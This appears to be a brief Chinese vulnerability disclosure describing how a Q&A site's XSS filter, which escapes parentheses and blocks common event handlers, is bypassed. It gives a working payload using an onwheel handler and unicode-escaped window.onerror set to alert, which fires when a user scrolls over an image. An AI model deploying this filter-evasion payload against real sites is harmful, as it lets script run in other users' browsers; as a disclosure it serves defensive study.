### 简要描述:
xss绕过技巧
### 详细说明:
[<img src="https://images.seebug.org/upload/201508/081036380a87d422553a35ed8303f89f52474990.png" alt="QQ截图20150808103846.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/081036380a87d422553a35ed8303f89f52474990.png)
首先一眼感觉这里可以插,因为提问和回答是交互功能
然而
[<img src="https://images.seebug.org/upload/201508/08103739e7a8b7cd9c1c90b06d76e1c3f8806a2b.png" alt="QQ截图20150808103935.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/08103739e7a8b7cd9c1c90b06d76e1c3f8806a2b.png)
过滤的挺死
括号被转义为全角
常见事件被过滤
部分标点被过滤
```
<img src="http://g.hiphotos.baidu.com/image/pic/item/7c1ed21b0ef41bd5f3bcaf4854da81cb38db3d9a.jpg" onwheel="window.\u006f\u006e\u0065\u0072\u0072\u006f\u0072=alert;throw /wooyun xss/">
```
这样即可绕过,自定义图片,可以是超级大图,在图片上滚动鼠标滚轮触发XSS
测试360谷歌火狐等浏览器有效,IE11测试没触发
### 漏洞证明:
我爱乌云么么哒
京公网安备 11010502034610号
暂无评论